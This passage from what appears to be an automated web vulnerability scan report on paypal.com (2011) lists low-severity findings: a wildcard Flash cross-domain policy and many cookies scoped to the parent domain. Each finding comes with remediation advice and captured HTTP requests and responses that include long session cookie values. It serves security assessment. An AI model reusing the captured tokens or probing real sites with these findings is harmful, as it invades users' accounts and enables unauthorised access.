Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=BbyMaXKL52sABwxakQNx00O3wkD1Wj_4h7pMNyNrIpB8QHnXzjmot4-Bam9KAQfUGtD5HEoWfR2gBNP5JPXn64lk3ri_MzF5M2BISsNUBmPrWxrcTMX6TYeMV__TjgtUb6_15G%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112195; navcmd=_registration-run; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=mBZummYRqWAaA52FK1uV3MMXLOHRD-DHmSjyJLU8i7KEY_HFWzNKESTeg-tp9AovhbDBh_KVhORs4ITxcfZG9IWV0T1meKyv4ByGQPJuc_Lk2GePfePU0VzB62i1Ig2tFVmu-P9KL4OOOoQptHQ3dtyI7lYtxh9nM-P_5oWKLGvxCEN4AdS-TxcJmcg-y0fQbQOvWdpNybDBxJYs_q3cfK8Fm6Pw2ApX-ooXWe_K7msbsfUzIGSvtcnyuhERieDgL-cTiqTje1fF1nDp8wxnusbEqApoEEQra-NI_qAUNB9gU4stHax9r8WsdONjUZbhqzEVyYcEjkyVBrkLLsQTvFDs_-weqmuVjgtzHIqwdoSKOaA2
Host: www.paypal.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:55:40 GMT
Server: Apache
Set-Cookie: navcmd=xpt%2fCustomer%2fgeneral%2fAbort; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 01:55:41 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_flow%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2026%20xpt%2fCustomer%2fgeneral%2fAbort%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2041%20Online%20Payment%2c%20Merchant%20Account%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 14815

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...

4. Flash cross-domain policy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.paypal.com

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:22:29 GMT
Server: Apache
Last-Modified: Tue, 10 Jun 2008 20:10:41 GMT
Accept-Ranges: bytes
Content-Length: 312
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.paypal.com" />
<allow-access-from domain="*.ebay.com" />
<allow-access-from domain="*.paypalobjects.com" />
...[SNIP]...

5. Cookie scoped to parent domain previous next
There are 25 instances of this issue:

/webapps/mpp/merchant
/webapps/mpp/website-payments-pro
/
/ca/cgi-bin/webscr
/cgi-bin/helpscr
/cgi-bin/helpscr
/cgi-bin/helpweb
/cgi-bin/marketingweb
/cgi-bin/marketingweb
/cgi-bin/searchscr
/cgi-bin/webscr
/cgi-bin/webscr
/express-checkout-buttons
/helpcenter/main.jsp
/security
/us/cgi-bin/
/us/cgi-bin/
/us/cgi-bin/helpscr
/us/cgi-bin/helpweb
/us/cgi-bin/marketingweb
/us/cgi-bin/searchscr
/us/cgi-bin/webscr
/us/cgi-bin/webscr
/us/ewf/f=pps_spf
/us/ewf/f=sa_unauth

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

5.1. https://www.paypal.com/webapps/mpp/merchant previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.paypal.com
Path:	/webapps/mpp/merchant

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SPARTAJSESSIONID=8c593daa7901b; Domain=.paypal.com; Path=/; Secure; HttpOnly
LANG=en_US%3BUS; Domain=.paypal.com; Path=/; Secure; HttpOnly
analytics=BmwsFRW4RPCsHHa32nsJIamY3eloEl9iEChKbWJ9JKvYfpr4mu.5hFItKoThr0S4FRq97sCZUDUoH8Z7z-ptX1d6RZ4lypbKpRthHlJjHmR19bvXGkBDcbkRqbpwz8Ei; Max-Age=631138519; Expires=Tue, 12-Aug-2031 11:04:00 GMT; Domain=.paypal.com; Path=/; Secure; HttpOnly

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapps/mpp/merchant HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20tr_p1%3Dsite%2520wide%2520search%2520results%3B%20v20%3Dxss%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dsite%2520wide%2520search%2520results%255E%255EBusiness%255E%255Esite%2520wide%2520search%2520results%2520%257C%2520Business%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dsite%25252520wide%25252520search%25252520results%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fmerchant.paypal.com%2525252Fcgi-bin%2525252Fmarketingweb%2525253Fcmd%2525253D_render-content%25252526content_ID%2525253Dmerchant%2525252Fhome%25252526nav%2525253D2%252526ot%25253DA%3B; s_pers=%20gpv_c43%3Dsite%2520wide%2520search%2520results%7C1313162363773%3B%20gpv_events%3DFailure%7C1313162365113%3B; navcmd=_render-content%26content_ID%3dmerchant%2fhome; cwrClyrK4LoCV1fydGbAxiNL6iG=MLQqxuwrfNB4GCgi5Tc5nJR8jQoFWYGnrVmOftTlbwLloOZ8AWj2pVAjVw2e_bZWPiiWgINZlRwMRCbOjtKn9n894IGC1O3m73c9x6j45AugHBvkMZ0i63Io-yJukjjq4BkaMm%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c1313160185

Response

5.2. https://www.paypal.com/webapps/mpp/website-payments-pro previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.paypal.com
Path:	/webapps/mpp/website-payments-pro

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SPARTAJSESSIONID=8c593daa7901b; Domain=.paypal.com; Path=/; Secure; HttpOnly
LANG=en_US%3BUS; Domain=.paypal.com; Path=/; Secure; HttpOnly
analytics=HiHfLxsJmMgeugkwZDcOzTMgdSQJBgaxufiaeby1v5AJNiJCmAJ04I9KPK2I7nwuqHesIQAj75pfeZDJPNQNzriJERWZGP9.scYSjvj5Mz7cJpP5EbpjGE5aKfMvBD4g; Max-Age=631138519; Expires=Tue, 12-Aug-2031 11:04:39 GMT; Domain=.paypal.com; Path=/; Secure; HttpOnly

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapps/mpp/website-payments-pro HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cms.paypal.com/us/cgi-bin/marketingweb?cmd=_render-content&content_ID=merchant/compare_wp_products
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20v20%3Dxss%3B%20s_cc%3Dtrue%3B%20s_ppv%3D0%3B%20tr_p1%3Dmkt-cms%253Abiz%253Ageneral%253Acomparewpproducts%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dmkt-cms%253Abiz%253Ageneral%253Acomparewpproducts%255E%255E%252Fcms_content%252FUS%252Fen_US%252Fimages%252Fmerchant%252Fbtn_select_70x24.gif%255E%255Emkt-cms%253Abiz%253Ageneral%253Acomparewpproducts%2520%257C%2520%252Fcms_content%252FUS%252Fen_US%252Fimages%252Fmerchant%252Fbtn_select_70x24.gif%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dmkt-cms%2525253Abiz%2525253Ageneral%2525253Acomparewpproducts%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fcms.paypal.com%2525252Fus%2525252Fcgi-bin%2525252F%2525253Fcmd%2525253D_render-content%25252526content_ID%2525253Dmerchant%2525252Fwp_pro%252526ot%25253DA%3B; s_pers=%20gpv_c43%3Dmkt-cms%253Abiz%253Ageneral%253Acomparewpproducts%7C1313162402821%3B%20gpv_events%3Dno%2520value%7C1313162404332%3B; navcmd=_render-content%26content_ID%3dmerchant%2fhome; cwrClyrK4LoCV1fydGbAxiNL6iG=MLQqxuwrfNB4GCgi5Tc5nJR8jQoFWYGnrVmOftTlbwLloOZ8AWj2pVAjVw2e_bZWPiiWgINZlRwMRCbOjtKn9n894IGC1O3m73c9x6j45AugHBvkMZ0i63Io-yJukjjq4BkaMm%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c1313160185; SPARTAJSESSIONID=8c593daa7901b; LANG=en_US%3BUS; analytics=bHHouPi7Z8x.36xfS4fKP9XDXTTS5NWYsXai52vu4P1bM1.P0RsJRdSYpkHkedHRjEZTIeLMAfLIA5yYXFusfzCuEy-qQTzEm73lShwLhKjd9RfPwfOfqYXOnhxdkaJ3

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:49:20 GMT
Server: Apache-Coyote/1.1
Cache-Control: must-revalidate
Cache-Control: proxy-revalidate
Cache-Control: no-cache
X-FRAME-OPTIONS: SAMEORIGIN
flag_logged_in: false
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Set-Cookie: SPARTAJSESSIONID=8c593daa7901b; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: LANG=en_US%3BUS; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; Domain=.paypal.com; Path=/; Secure; HttpOnly
Set-Cookie: analytics=HiHfLxsJmMgeugkwZDcOzTMgdSQJBgaxufiaeby1v5AJNiJCmAJ04I9KPK2I7nwuqHesIQAj75pfeZDJPNQNzriJERWZGP9.scYSjvj5Mz7cJpP5EbpjGE5aKfMvBD4g; Max-Age=631138519; Expires=Tue, 12-Aug-2031 11:04:39 GMT; Domain=.paypal.com; Path=/; Secure; HttpOnly
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 523020

<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="keywords" content="payment processing, online payment processing, website payments pro"><meta name="description" content="A me
...[SNIP]...

5.3. https://www.paypal.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cwrClyrK4LoCV1fydGbAxiNL6iG=jdB7YmFJdBAmYatfkLa_e_MUwkzUwN2becl4foK9XdxpaoFcwr7k4yeggSnz1xXeqJgyxfcJ_32kQjtKNmfr2MNA_gkMTN8BzaKM8GIueGWrF1lCa4GDXCBI3PcLnQ_cbS93f0%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112146; domain=.paypal.com; path=/; Secure; HttpOnly
KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; expires=Thu, 07-Aug-2031 01:22:26 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Mon, 09-Aug-2021 01:22:26 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive

Response

5.4. https://www.paypal.com/ca/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/ca/cgi-bin/webscr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=xpt%2fMarketing_CommandDriven%2fgeneral%2fPBPInfo-outside; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%2051%20xpt%2fMarketing_CommandDriven%2fgeneral%2fPBPInfo-outside%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2051%20xpt%2fMarketing_CommandDriven%2fgeneral%2fPBPInfo-outside%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2032%20PayPal%20Buyer%20Protection%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ca/cgi-bin/webscr?cmd=xpt/Marketing_CommandDriven/general/PBPInfo-outside HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.5. https://www.paypal.com/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpscr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_registration-run; domain=.paypal.com; path=/; Secure; HttpOnly
pNTcMTtQfrJuaJiwEnWXQ6yNxfq=5klSxkEOODTUnNA7XCTBEwCcU0esqv7RetQr7ccveO9miO7A7JjbbWAcUtGfKL2AgThBMUpM4EUgAxNpqMMsBrhZXr5hMm5fkFXzsKnJCW6sHkCOkRrcIZt3z49ZwgTsFotV9g4sxa_V3D2iqhi1cZehFOQgn9pFDu1CmqG9NQihD-RjUqTfCEczQc4plKPQPiYx8gPhAwDIl9OIgQZsCtCMjvzyzIO0D679__Kdzk8qJUnTvDqqXZL_LfIpfI1En5pMtZJX5_dErYm0R1oOdFMuMEC5uAF-GivblTCghi4bA0H4FlQEE3Vzr1yXIiI8jllTA6ZUpIocCOlKefxFyuB72DP0JgoLxidZhk8ardrb1F-9Zi6uHBWVh_hoG0_tSsZ7xigZN4kTduuQke3H94vYEaqlNKpIXDsrEJZDd7vHdp5w969Xh0wtxJrjQQ4Re6oXqkYlYfGAnAb2jBJMC4xU6KgsYwLH2Kcw9SvvnsYOGLK6xastQgszpVsnH-fSfEZCYUqWCPFmdD7tD3_Qj-rhVHcgIyaWXUgbIgqfvL1aZxMI32QMaqexvvydOT1YRp0aVgXBjKXh4yVJbTKIPn6N5YUc8kSfJg94QqQ3btlBFLUbOe4EWAi4jcH6rMCtBm3JTG; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/helpscr?cmd=_registration-run HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 12 Aug 2011 13:47:14 GMT
Server: Apache
Set-Cookie: navcmd=_registration-run; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: pNTcMTtQfrJuaJiwEnWXQ6yNxfq=5klSxkEOODTUnNA7XCTBEwCcU0esqv7RetQr7ccveO9miO7A7JjbbWAcUtGfKL2AgThBMUpM4EUgAxNpqMMsBrhZXr5hMm5fkFXzsKnJCW6sHkCOkRrcIZt3z49ZwgTsFotV9g4sxa_V3D2iqhi1cZehFOQgn9pFDu1CmqG9NQihD-RjUqTfCEczQc4plKPQPiYx8gPhAwDIl9OIgQZsCtCMjvzyzIO0D679__Kdzk8qJUnTvDqqXZL_LfIpfI1En5pMtZJX5_dErYm0R1oOdFMuMEC5uAF-GivblTCghi4bA0H4FlQEE3Vzr1yXIiI8jllTA6ZUpIocCOlKefxFyuB72DP0JgoLxidZhk8ardrb1F-9Zi6uHBWVh_hoG0_tSsZ7xigZN4kTduuQke3H94vYEaqlNKpIXDsrEJZDd7vHdp5w969Xh0wtxJrjQQ4Re6oXqkYlYfGAnAb2jBJMC4xU6KgsYwLH2Kcw9SvvnsYOGLK6xastQgszpVsnH-fSfEZCYUqWCPFmdD7tD3_Qj-rhVHcgIyaWXUgbIgqfvL1aZxMI32QMaqexvvydOT1YRp0aVgXBjKXh4yVJbTKIPn6N5YUc8kSfJg94QqQ3btlBFLUbOe4EWAi4jcH6rMCtBm3JTG; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:47:15 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Location: https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&SESSION=dlWzTo4YdFQOnAJ7Q7OtvwDMo5005RRMwnRxBsXYvhZ0QJvD2o5EWiU0w0C&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html
Content-Length: 0

5.6. https://www.paypal.com/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpscr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%2013%20_home-general%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/helpscr?cmd=_home-general&nav=0 HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.7. https://www.paypal.com/cgi-bin/helpweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpweb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/helpweb HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.8. https://www.paypal.com/cgi-bin/marketingweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/marketingweb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
feel_cookie=a%2013%20_home-general%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/marketingweb?cmd=_home-general&nav=0 HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

5.9. https://www.paypal.com/cgi-bin/marketingweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/marketingweb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

navcmd=_registration-run; domain=.paypal.com; path=/; Secure; HttpOnly
pNTcMTtQfrJuaJiwEnWXQ6yNxfq=A_M2c43mxbS3NKLjnOOSKt5BOWrvkjLOz0vwmVoI2XtBpW9ewJkBkmenqC-iIi-uwz-FMX1ufsocEFkcI4jq1o_0IvO89uWGWt9zz8i153mLpq8wlO9ACTHBmnw4K8L21YljCLmo8iv9zR6IBJ10klTGc_XUlsNuIyyUsz8sGBg8GK0KINDjyhZcNnAfWX6D6mZ_juRr55l2SjmVC06N32YR4hgDDSmaSpWjXA2rEjDT4IPUjPa7dlPb19NQeIKK4W8TxCFtR_GyczGwNLTMaxtX8vNcxgEwrV_7wwdaOvaVNSTIWDDK9A-FjSn3XPEnzQbtDHaCKU4VV5N5fgz_fTAxPi7Ws83k-vX-dQ2liJHNynrfyaowPx3dq0_DbSQ5f8Hx2os_FYK-KAbHNMiSB9CIG2OKchBry1NlSMRTjCAfeqhDwQsVpHvbppiaXf8PtQ8S7FZcGFV8qlllIR2l77ZNmaaBJAq5hjrmApChC4zuS4cGRPQ9rjAkBjOJQVMKZGDBI31ZVbk1c-FuGpOKzdK3kO_gcQatho4bp3EEVlGY9UaIUgv9UvFx6__M18C7qsqFSBIgU2pnL8uLX8FtUOTlIVD3VuYNu7YnKXiK3-TNmVCnYikYfBmWHlPseg4KITl15m; domain=.paypal.com; path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/marketingweb?cmd=_registration-run HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 12 Aug 2011 13:47:19 GMT
Server: Apache
Set-Cookie: navcmd=_registration-run; domain=.paypal.com; path=/; Secure; HttpOnly
